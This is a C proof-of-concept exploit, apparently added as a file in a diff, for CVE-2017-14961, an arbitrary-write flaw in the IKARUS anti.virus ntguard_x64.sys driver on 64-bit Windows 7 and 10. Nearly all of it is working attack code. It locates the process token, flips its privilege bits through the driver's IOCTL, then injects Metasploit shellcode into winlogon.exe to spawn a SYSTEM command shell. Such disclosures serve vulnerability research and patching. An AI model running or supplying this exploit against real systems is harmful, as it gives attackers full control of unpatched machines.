+Discovered by    - Parvez Anwar (@parvezghh)
+Vendor Homepage  - https://www.ikarussecurity.com/
+Tested Version   - 2.16.7
+Driver Version   - 0.18780.0.0 - ntguard_x64.sys
+Tested on OS     - 64bit Windows 7 and Windows 10 (1709) 
+CVE ID           - CVE-2017-14961
+Vendor fix url   - Soon to be released
+Fixed Version    - 2.16.18
+Fixed driver ver - 0.43.0.0
+
+
+Check blogpost for details:
+
+https://www.greyhathacker.net/?p=995
+
+*/
+
+
+#include <stdio.h>
+#include <windows.h>
+#include <TlHelp32.h>
+
+#pragma comment(lib,"advapi32.lib")
+
+#define SystemHandleInformation 16
+#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
+
+
+typedef unsigned __int64 QWORD;
+
+
+typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
+{
+     ULONG       ProcessId;
+     UCHAR       ObjectTypeNumber;
+     UCHAR       Flags;
+     USHORT      Handle;
+     QWORD       Object;
+     ACCESS_MASK GrantedAccess;
+} SYSTEM_HANDLE, *PSYSTEM_HANDLE;
+
+
+typedef struct _SYSTEM_HANDLE_INFORMATION 
+{
+     ULONG NumberOfHandles;
+     SYSTEM_HANDLE Handles[1];
+} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
+
+
+typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
+     ULONG SystemInformationClass,
+     PVOID SystemInformation,
+     ULONG SystemInformationLength,
+     PULONG ReturnLength);
+
+
+
+
+DWORD getProcessId(char* process)
+{
+     HANDLE          hSnapShot;
+     PROCESSENTRY32  pe32;
+     DWORD           pid;
+
+
+     hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+
+     if (hSnapShot == INVALID_HANDLE_VALUE) 
+     {
+         printf("\n[-] Failed to create handle CreateToolhelp32Snapshot()\n\n");
+         return -1;
+     } 
+
+     pe32.dwSize = sizeof(PROCESSENTRY32);
+
+     if (Process32First(hSnapShot, &pe32) == FALSE)
+     {
+         printf("\n[-] Failed to call Process32First()\n\n");
+         return -1;
+     }
+        
+     do
+     {
+         if (stricmp(pe32.szExeFile, process) == 0)
+         {
+             pid = pe32.th32ProcessID;
+             return pid;
+         }
+     } while (Process32Next(hSnapShot, &pe32));
+
+     CloseHandle(hSnapShot);
+     return 0;
+}
+
+
+int spawnShell()
+{
+// windows/x64/exec - 275 bytes http://www.metasploit.com
+// VERBOSE=false, PrependMigrate=false, EXITFUNC=thread, CMD=cmd.exe
+
+     char shellcode[] =
+     "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" 
+     "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" 
+     "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" 
+     "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" 
+     "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" 
+     "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48" 
+     "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40" 
+     "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" 
+     "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41" 
+     "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1" 
+     "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c" 
+     "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" 
+     "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" 
+     "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b" 
+     "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 
+     "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" 
+     "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd" 
+     "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0" 
+     "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff" 
+     "\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00";
+
+     char*     process = "winlogon.exe";
+     DWORD     pid;
+     HANDLE    hProcess;
+     HANDLE    hThread;
+     LPVOID    ptrtomem;
+
+
+     pid = getProcessId(process);
+
+     if ((hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid)) == NULL)
+     {
+         printf("\n[-] Unable to open %s process\n\n", process);
+         return -1;
+     }
+     printf("\n[+] Opened %s process pid=%d with PROCESS_ALL_ACCESS rights", process, pid);
+
+     if ((ptrtomem = VirtualAllocEx(hProcess, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE)) == NULL)
+     {
+         printf("\n[-] Unable to allocate memory in target process\n\n");
+         return -1;
+     }
+     printf("\n[+] Memory allocated at address 0x%p", ptrtomem);
+
+     if (!(WriteProcessMemory(hProcess, (LPVOID)ptrtomem, shellcode, sizeof(shellcode), NULL)))
+     {
+         printf("\n[-] Unable to write to process memory\n\n");
+         return -1;
+     }
+     printf("\n[+] Written to allocated process memory");
+ 
+     if ((hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)ptrtomem, NULL, 0, NULL)) == NULL)
+     {
+         CloseHandle(hThread);
+         printf("\n[-] Unable to create remote thread\n\n");
+         return -1;
+     }
+     printf("\n[+] Created remote thread and executed\n\n");   
+
+     return 0;
+}
+
+
+
+QWORD TokenAddressCurrentProcess(HANDLE hProcess, DWORD MyProcessID) 
+{
+    _NtQuerySystemInformation   NtQuerySystemInformation;
+    PSYSTEM_HANDLE_INFORMATION  pSysHandleInfo; 
+    ULONG                       i;
+    PSYSTEM_HANDLE              pHandle;
+    QWORD                       TokenAddress = 0;       
+    DWORD                       nSize = 4096;
+    DWORD                       nReturn; 
+    BOOL                        tProcess;    
+    HANDLE                      hToken;
+
+
+    if ((tProcess = OpenProcessToken(hProcess, TOKEN_QUERY, &hToken)) == FALSE)
+    {
+        printf("\n[-] OpenProcessToken() failed (%d)\n", GetLastError());
+        return -1;
+    }
+
+    NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
+ 	
+    if (!NtQuerySystemInformation)
+    {
+        printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
+        return -1;  
+    }
+
+    do
+    {  
+        nSize += 4096;
+        pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION) HeapAlloc(GetProcessHeap(), 0, nSize); 
+    } while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH);
+	
+    printf("\n[i] Current process id %d and token handle value %u", MyProcessID, hToken);	
+
+    for (i = 0; i < pSysHandleInfo->NumberOfHandles; i++) 
+    {
+
+        if (pSysHandleInfo->Handles[i].ProcessId == MyProcessID && pSysHandleInfo->Handles[i].Handle == hToken) 
+        {
+            TokenAddress = pSysHandleInfo->Handles[i].Object;	     			  
+        }
+    }
+
+    HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
+    return TokenAddress;	
+}
+
+
+
+int main(int argc, char *argv[]) 
+{
+
+    QWORD      TokenAddressTarget; 
+    QWORD      SepPrivilegesOffset = 0x40;
+    QWORD      PresentByteOffset;
+    QWORD      EnableByteOffset;
+    QWORD      TokenAddress;
+    HANDLE     hDevice;
+    char       devhandle[MAX_PATH];
+    DWORD      dwRetBytes = 0;             
+
+
+    printf("-------------------------------------------------------------------------------\n");
+    printf("        IKARUS anti.virus (ntguard_x64.sys) Arbitrary Write EoP Exploit        \n");
+    printf("                 Tested on 64bit Windows 7 / Windows 10 (1709)                 \n");
+    printf("-------------------------------------------------------------------------------\n");
+
+    TokenAddress = TokenAddressCurrentProcess(GetCurrentProcess(), GetCurrentProcessId());
+    printf("\n[i] Address of current process token 0x%p", TokenAddress);
+
+    TokenAddressTarget = TokenAddress + SepPrivilegesOffset;
+    printf("\n[i] Address of _SEP_TOKEN_PRIVILEGES 0x%p will be overwritten\n", TokenAddressTarget);
+
+    PresentByteOffset = TokenAddressTarget + 0x2;
+    printf("[i] Present bits at 0x%p will be overwritten with 0x11\n", PresentByteOffset);
+
+    EnableByteOffset = TokenAddressTarget + 0xa;
+    printf("[i] Enabled bits at 0x%p will be overwritten with 0x11", EnableByteOffset);
+
+    sprintf(devhandle, "\\\\.\\%s", "ntguard");
+
+    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
+    
+    if(hDevice == INVALID_HANDLE_VALUE)
+    {
+        printf("\n[-] Open %s device failed\n\n", devhandle);
+        return -1;
+    }
+    else 
+    {
+        printf("\n[+] Open %s device successful", devhandle);
+    }	
+
+    printf("\n[~] Press any key to continue . . .\n");
+    getch();
+
+    DeviceIoControl(hDevice, 0x8300000c, NULL, 0, (LPVOID)PresentByteOffset, 0, &dwRetBytes, NULL);
+    DeviceIoControl(hDevice, 0x8300000c, NULL, 0, (LPVOID)EnableByteOffset, 0, &dwRetBytes, NULL);
+
+    printf("[+] Overwritten _SEP_TOKEN_PRIVILEGES bits\n");
+    CloseHandle(hDevice);
+
+    printf("[*] Spawning SYSTEM Shell");
+    spawnShell();
+
+    return 0;
+}        
\ No newline at end of file